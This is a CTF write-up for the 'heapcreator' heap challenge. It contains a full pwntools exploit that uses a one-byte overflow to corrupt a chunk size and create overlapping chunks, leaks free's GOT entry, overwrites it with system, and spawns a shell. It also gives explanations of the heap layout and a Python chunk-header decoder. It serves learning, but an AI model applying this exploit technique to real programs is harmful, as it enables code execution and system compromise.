hitcontraining_heapcreator: a small point of confusion

exp:

from pwn import *
from LibcSearcher import LibcSearcher

#sh=remote("node3.buuoj.cn",25984)
sh = process("./heapcreator")
elf = ELF('./heapcreator')

def create(length, value):
    sh.recvuntil("Your choice :")
    sh.sendline("1")
    sh.recvuntil("Size of Heap : ")
    sh.sendline(str(int(length)))
    sh.recvuntil("Content of heap:")
    sh.sendline(value)

def edit(index, value):
    sh.recvuntil("Your choice :")
    sh.sendline("2")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))
    sh.recvuntil("Content of heap : ")
    sh.sendline(value)

def show(index):
    sh.recvuntil("Your choice :")
    sh.sendline("3")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))

def delete(index):
    sh.recvuntil('Your choice :')
    sh.sendline('4')
    sh.recvuntil('Index :')
    sh.sendline(str(int(index)))

create(0x18, b'aaaa')
create(0x10, b'bbbb')
create(0x10, b'cccc')
create(0x10, b'/bin/sh')

# 0x18 bytes fill chunk0; the one extra byte lands on the low byte of chunk1's size field
# (bytes literals are used so pwntools sends 0x81 as a single byte rather than re-encoding it)
edit(0, b'a' * 0x18 + b'\x81')
delete(1)

# re-create with size 0x70 so the new content chunk spans the region discussed in question 2
size = b'\x08'.ljust(8, b'\x00')
payload = b'd' * 0x40 + size + p64(elf.got['free'])
create(0x70, payload)
gdb.attach(sh)   # debugging aid: attaches gdb here to inspect the heap
show(2)
sh.recvuntil('Content : ')
free_addr = u64(sh.recvuntil('Done')[:-5].ljust(8, b'\x00'))

libc = LibcSearcher("free", free_addr)
system_addr = free_addr + libc.dump("system") - libc.dump("free")

edit(2, p64(system_addr))
delete(3)
sh.interactive()

1. Why free chunk1 and then malloc again before filling in the data, instead of filling in the data directly?

Suppose we fill in the data directly, changing the exp slightly:

Then, looking at the heap, we find:

chunk1's size has not changed, so at most 0x10 bytes of data can still be entered. That is why we have to free it first and then malloc(0x70), so that the chunk's size becomes 0x70, and only then fill in the data.

2. As shown in the figure:

Why does the data we enter start at 0x1616050?

Because every add creates two chunks. The first chunk is the one at 0x1616070, which will be overwritten later; that is where my confusion came from. The second chunk, the one the data goes into, is at 0x1616040: 0x1616048 is the size field, and 0x1616050 is where the data is stored.
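To make both points checkable without a debugger, here is an added example (my own code, not part of the original post or of the heapcreator challenge) that decodes 64-bit glibc malloc chunk headers from a byte dump the way a heap viewer does. It shows that user data starts 0x10 bytes past the chunk address (so a chunk at 0x1616040 has its size word at 0x1616048 and its data at 0x1616050), which request sizes map to which chunk lengths (0x10 and 0x18 both get a 0x20 chunk, 0x70 gets 0x80), and what the size word of the following chunk reads after the 0x19-byte edit from the exp. The dump bytes, the base address 0x1616040 (taken from the author's description of the screenshot), and the chunk sizes are all constructed for illustration; note that the "size" the author refers to in question 1 is the program's own recorded size, which is separate from the malloc size word decoded here.

```python
import struct

FLAG_BITS = 0x7   # low three bits of the size word are flags, not part of the length
PREV_INUSE = 0x1
SIZE_SZ = 8       # one size field on 64-bit glibc
HEADER = 16       # prev_size (8 bytes) + size (8 bytes)
MIN_CHUNK = 0x20

def request_to_chunk_size(n):
    """Chunk length glibc picks for a malloc(n) request on 64-bit (request2size)."""
    size = (n + SIZE_SZ + 15) & ~15
    return max(size, MIN_CHUNK)

def make_chunk(size_word, user_data=b''):
    """Raw image of one in-use chunk: prev_size, size word, then the chunk body.

    The body is size-16 bytes; the 8 bytes right after it are the next chunk's
    prev_size field, which an in-use chunk may also use, so a 0x20 chunk
    serves an 0x18-byte request.
    """
    chunk_len = size_word & ~FLAG_BITS
    body_len = chunk_len - HEADER
    if len(user_data) > body_len:
        raise ValueError("data does not fit in the chunk body")
    return struct.pack('<QQ', 0, size_word) + user_data.ljust(body_len, b'\x00')

def walk_chunks(dump, base):
    """Decode consecutive chunks from `dump`, whose first byte lives at address `base`."""
    chunks = []
    off = 0
    while off + HEADER <= len(dump):
        _prev_size, size_word = struct.unpack_from('<QQ', dump, off)
        size = size_word & ~FLAG_BITS
        if size == 0:
            break  # constructed terminator; a real walk would stop at the top chunk
        chunks.append({
            'chunk_addr': base + off,
            'size_addr': base + off + SIZE_SZ,
            'data_addr': base + off + HEADER,
            'size': size,
            'usable': size - SIZE_SZ,
            'prev_inuse': bool(size_word & PREV_INUSE),
        })
        off += size
    return chunks

def write_at(dump, base, addr, data):
    """Copy of `dump` with `data` written at address `addr`, deliberately without a
    length check against the owning chunk, so the effect on following bytes is visible."""
    off = addr - base
    if off < 0 or off + len(data) > len(dump):
        raise ValueError("write falls outside the dump")
    return dump[:off] + data + dump[off + len(data):]

BASE = 0x1616040  # assumed: the chunk address the author reads off the screenshot

def constructed_dump():
    """Four back-to-back 0x20 chunks (what malloc(0x10) / malloc(0x18) produce),
    followed by a zero size word so the walk terminates. Constructed sample data."""
    dump = b''.join(make_chunk(0x21, tag) for tag in (b'aaaa', b'bbbb', b'cccc', b'dddd'))
    return dump + b'\x00' * HEADER

def demo():
    """Walk the dump before and after a 0x19-byte write into the first chunk's data."""
    before = walk_chunks(constructed_dump(), BASE)
    first = before[0]
    # 0x18 bytes fill the first chunk's usable area; the 25th byte lands on the
    # low byte of the next chunk's size word (the edit(0, ...) line in the exp).
    overwritten = write_at(constructed_dump(), BASE, first['data_addr'], b'a' * 0x18 + b'\x81')
    after = walk_chunks(overwritten, BASE)
    return before, after

if __name__ == '__main__':
    before, after = demo()
    for label, chunks in (('before', before), ('after', after)):
        print(label)
        for c in chunks:
            print(f"  chunk {c['chunk_addr']:#x}  size@{c['size_addr']:#x} = {c['size']:#x}"
                  f"  data@{c['data_addr']:#x}  usable {c['usable']:#x}")
```

Running it prints four 0x20 chunks before the write and only two afterwards: the second chunk's size word now reads 0x81 (length 0x80, PREV_INUSE set), so the walker treats the following 0x60 bytes as part of it, which is exactly what the heap view shows after the edit and why a later malloc(0x70) request (chunk length 0x80) fits there.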


posted @ 2021-09-28 18:04  ATKevin